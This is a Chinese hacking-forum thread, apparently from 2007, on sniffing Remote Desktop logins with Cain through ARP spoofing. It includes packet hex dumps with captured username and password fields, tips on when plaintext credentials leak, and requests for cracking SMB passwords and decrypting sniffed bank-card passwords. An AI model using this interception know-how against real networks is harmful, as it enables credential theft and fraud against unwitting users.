0170 45 01 11 d0 30 b8 34 68 85 b1 82 42 a8 a0 1d dd E...0.4h...B....
0180 af a5 12 63 f0 f8 92 15 79 81 88 f7 77 ea 21 f2 ...c....y...w.!.
0190 28 1b 94 20 12 04 91 b0 36 c3 c7 d4 02 18 92 be (.. ....6.......
01a0 78 4e f7 c7 00 ca d0 ee a1 c6 f7 2c 87 b9 24 2f xN.........,..$/
01b0 cb 15 03 c1 b9 5d f0 d6 81 a0 83 61 6e 1c 3a 12 .....].....an.:.
01c0 2a ee 54 29 2a 8c 52 c8 01 a8 22 bc 04 a2 97 99 *.T)*.R...".....
01d0 75 25 37 7c d7 e9 e5 38 a1 25 fd 44 5a 05 07 8c u%7|...8.%.DZ...
01e0 10 47 c6 41 5f cc 0d e1 23 9b 2a 9e 57 94 9d ce .G.A_...#.*.W...
01f0 41 97 85 99 1d 7e c0 c5 b2 12 0d 96 b4 94 27 88 A....~........'.
0200 f3 d5 f7 84 07 a5 71 45 7f f6 12 22 de 04 91 26 ......qE..."...&
0210 22 58 b6 8c ff 4f ae 14 e3 3c d0 56 40 a6 47 f7 "X...O...<.V@.G.
0220 0a ff eb 86 ab 93 f4 2b c2 73 54 bb 6a ce 90 23 .......+.sT.j..#
0230 33 89 1c 48 e9 67 7a 69 de 4a 1a 25 5c ea a8 f4 3..H.gzi.J.%\...
0240 69 b3 79 ac f2 4f 94 7e 5c 52 8b d0 5c b6 2e e7 i.y..O.~\R..\...
0250 b6 8a 6b d2 ed 7f 81 00 00 00 00 00 00 02 00 1a ..k.............
0260 00 31 00 39 00 32 00 2e 00 31 00 36 00 38 00 2e .1.9.2...1.6.8..
0270 00 30 00 2e 00 31 00 35 00 00 00 62 00 45 00 3a .0...1.5...b.E.:
0280 00 5c 00 6f 8f f6 4e 27 59 68 51 5c 00 33 00 33 .\.o..N'YhQ\.3.3
0290 00 38 00 39 00 dc 8f 0b 7a 7b 76 46 96 68 56 5c .8.9....z{vF.hV\
02a0 00 77 00 77 00 77 00 2e 00 43 00 68 00 69 00 6e .w.w.w...C.h.i.n
02b0 00 61 00 44 00 6f 00 77 00 6e 00 5a 00 2e 00 63 .a.D.o.w.n.Z...c
02c0 00 6f 00 6d 00 5c 00 6d 00 73 00 74 00 73 00 63 .o.m.\.m.s.t.s.c
02d0 00 61 00 78 00 2e 00 64 00 6c 00 6c 00 00 00 20 .a.x...d.l.l...
02e0 fe ff ff 2d 4e fd 56 07 68 c6 51 f6 65 f4 95 00 ...-N.V.h.Q.e...
02f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0330 00 00 00 00 00 00 00 2d 4e fd 56 07 68 c6 51 f6 .......-N.V.h.Q.
0340 65 f4 95 00 00 00 00 00 00 00 00 00 00 00 00 00 e...............
0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ................
0390 00 00 00 00 00 00 00 .......
我嗅探结果是以上这样,怎么回事哦?求教 [客户端解码的数据包] - 共 393 个字节; 366 个解码的字节
0000 03 00 01 89 02 f0 80 64 00 06 03 eb 70 81 7a 48 .......d....p.zH
0010 00 00 00 b2 8c 52 c8 09 50 3d 25 04 08 04 08 bb .....R..P=%.....
0020 43 00 00 00 00 1a 00 10 00 00 00 00 00 00 00 61 C..............a
0030 00 64 00 6d 00 69 00 6e 00 69 00 73 00 74 00 72 .d.m.i.n.i.s.t.r
0040 00 61 00 74 00 6f 00 72 00 00 00 50 00 41 00 53 .a.t.o.r...P.A.S
0050 00 53 00 57 00 4f 00 52 00 44 00 00 00 00 00 00 .S.W.O.R.D......
0060 00 02 00 1c 00 31 00 39 00 32 00 2e 00 31 00 36 .....1.9.2...1.6
0070 00 38 00 2e 00 31 00 2e 00 32 00 31 00 31 00 00 .8...1...2.1.1..
0080 00 50 00 45 00 3a 00 5c 00 51 00 51 00 44 00 6f .P.E.:.\.Q.Q.D.o
0090 00 77 00 6e 00 6c 00 6f 00 61 00 64 00 5c 00 e5 .w.n.l.o.a.d.\..
00a0 5d 77 51 5c 00 73 00 65 00 72 00 76 00 65 00 72 ]wQ\.s.e.r.v.e.r
00b0 00 32 00 30 00 30 00 33 00 5c 00 6d 00 73 00 74 .2.0.0.3.\.m.s.t
00c0 00 73 00 63 00 61 00 78 00 2e 00 64 00 6c 00 6c .s.c.a.x...d.l.l
00d0 00 00 00 20 fe ff ff 2d 4e fd 56 07 68 c6 51 f6 ... ...-N.V.h.Q.
00e0 65 f4 95 00 00 00 00 00 00 00 00 00 00 00 00 00 e...............
00f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0120 00 00 00 00 00 00 00 00 00 00 00 2d 4e fd 56 07 ...........-N.V.
0130 68 c6 51 f6 65 f4 95 00 00 00 00 00 00 00 00 00 h.Q.e...........
0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0180 00 00 00 07 00 00 00 00 00 .........
不错不错,密码出来了。
在这里请教一下,SMB密码怎么破? [quote]引用第30楼唐不狐于2007-02-11 20:09发表的 :
目前我的测试只能证明 猪三的 经验是正确的
环境:两台处于同一交换机下的2003server,我在其中一台安装cain4.2 (从玫瑰那下载的),配置sniffer终端RDP。(端口被我修改了,不是默认的3389,但我想不影响结果)
我注意到这样一个现象:
开启arp欺骗之后,我[color=red]使用3389客户端远程连接的时候,一连上目标机子(还未输入密码)的时候,就发现在cain的RDP嗅探数据中已经有了捕获数据[/color]。然后我输入正确的帐号和密码成功登陆,完成后,再查看捕获的数据。正常情况下出现用户名的地方是我终端客户端开始已存的用户名而非我正确登陆的用户名,后面没有密码。然后我查找数据。分析用户名出现的规则:n.a.m.e 这样的,进行全文搜索,结果是我能够找到正确登陆的用户名,密码仍然没有。(密码出现的规则也是p.a.s.s这样)
.......[/quote]
我特意用交换机环境测试的,和唐不狐的结论一摸一样 [color=FF0000]不[/color][color=FF0306]测[/color][color=FF060C]试[/color][color=FF0912]啦[/color][color=FF0C18],[/color][color=FF0F1E]现[/color][color=FF1224]在[/color][color=FF152A]开[/color][color=FF1831]3[/color][color=FF1B37]3[/color][color=FF1E3D]8[/color][color=FF2243]9[/color][color=FF2549]的[/color][color=FF284F]人[/color][color=FF2B55]很[/color][color=FF2E5B]少[/color][color=FF3161]啦[/color][color=FF3467],[/color][color=FF376D]开[/color][color=FF3A73]了[/color][color=FF3D79]3[/color][color=FF4080]3[/color][color=FF4386]8[/color][color=FF468C]9[/color][color=FF4992]的[/color][color=FF4C98]也[/color][color=FF4F9E]不[/color][color=FF52A4]会[/color][color=FF55AA]用[/color][color=FF58B0]a[/color][color=FF5BB6]d[/color][color=FF5EBC]m[/color][color=FF62C2]i[/color][color=FF65C8]n[/color][color=FF68CE]i[/color][color=FF6BD4]s[/color][color=FF6EDB]t[/color][color=FF71E1]r[/color][color=FF74E7]a[/color][color=FF77ED]t[/color][color=FF7AF3]o[/color][color=FF7DF9]r[/color][color=FF80FF]了[/color] 又翻出这个帖子。
还是更新下结论。
3389的嗅探只有当客户端用户名密码同时发送才能嗅到明文的。也就是说客户端预先把帐号密码都输入在连接器里面,并不一定要保存。 我着的多数机器都是用ADMINISTRATOR登陆的
下个拉去试试 === Cain's RDP sniffer generated file ===
===========================================
[RDP connection]
--------------
Server address: 125.90.80.150
Client address: 59.62.18.34
--------------
为什么没有数据。。。就只有这个IP。。。。。 上次是你ncph.NET卡吧会报代码恶意,
应该是页面文件的问题吧
嗅探到的银行卡的加密密码能用什么解呐.. 为什么我无法改变搜索的IP段? 杀毒软件说这个有毒!
页:
[1]
2